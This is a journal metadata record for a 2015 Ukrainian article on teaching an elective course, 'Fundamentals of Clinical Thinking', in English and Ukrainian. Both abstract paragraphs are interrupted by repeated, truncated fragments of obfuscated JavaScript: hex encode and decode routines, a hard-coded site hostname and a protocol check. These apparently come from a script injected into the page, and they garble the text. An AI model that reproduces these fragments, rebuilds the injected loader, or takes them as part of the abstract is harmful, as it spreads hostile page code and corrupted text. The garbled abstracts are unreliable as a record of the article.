Запис Детальніше

FEATURES OF TEACHING OF THE ELECTIVE COURSE “FUNDAMENTALS OF CLINICAL THINKING” IN THE PROPEDEUTICS OF INTERNAL MEDICINE DEPARTMENT

Наукові журнали Тернопільського державного медичного університету імені І.Я.Горбачевського

Переглянути архів Інформація
 
 
Поле Співвідношення
 
Title FEATURES OF TEACHING OF THE ELECTIVE COURSE “FUNDAMENTALS OF CLINICAL THINKING” IN THE PROPEDEUTICS OF INTERNAL MEDICINE DEPARTMENT
ОСОБЛИВОСТІ ВИКЛАДАННЯ КУРСУ ЗА ВИБОРОМ “ОСНОВИ КЛІНІЧНОГО МИСЛЕННЯ” НА КАФЕДРІ ПРОПЕДЕВТИКИ ВНУТРІШНЬОЇ МЕДИЦИНИ
 
Creator Zozuliak, N. V.; Тернопільський державний медичнрй університет імені І.Я. Горбачевського
 
Subject





 
Description At the beginning of the third year of study students have the opportunity to choose an elective course “Fundamentals of clinical thinking”. After finishing of the elective course the student becomes able to interview and examine the patient, assess patient’s additional methods of investigations, analyze the data according to the particular algorithm and make differential diagnosis of diseases. For better learning it was offered to use “method of the project” based on independent work. Student independently performs examining of the patients and analyzing the data, and the teacher acts as an “observer”. As a result, the subject is learned by students much more efficiently, and classes are interesting for students.// o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t="",o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return "ojs.tdmu.edu.ua"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e
На початку третього курсу студентам надається можливість обрати курс за вибором “Основи клінічного мислення”.  Після опанування елективного курсу студент має оволодіти вмінням опитувати та обстежувати хворого, оцінювати дані додаткових методів обстежень, аналізувати дані за певним алгоритмом та здійснювати диференціальну діагностику захворювань. Для кращого засвоєння матеріалу запропоновано використовувати “метод проектів”, що ґрунтується на самостійній роботі студента. Тобто студент самостійно виконує обстеження хворих та аналіз отриманих даних, а викладач виступає у ролі “спостерігача”. У результаті предмет засвоюється набагато ефективніше, а заняття проходить цікавіше для студентів.// o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t="",o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return "ojs.tdmu.edu.ua"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e// o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t="",o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return "ojs.tdmu.edu.ua"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e
 
Publisher Ternopil State Medical University
 
Contributor

 
Date 2015-12-14
 
Type info:eu-repo/semantics/article
info:eu-repo/semantics/publishedVersion



 
Format application/pdf
 
Identifier http://ojs.tdmu.edu.ua/index.php/med_osvita/article/view/5313
10.11603/me.v0i4.5313
 
Source Medical Education; № 4 (2015)
Медична освіта; № 4 (2015)
2414-5998
1681-2751
10.11603/me.v0i4
 
Language ukr
 
Relation http://ojs.tdmu.edu.ua/index.php/med_osvita/article/view/5313/4882
 
Coverage





 
Rights ##submission.copyrightStatement##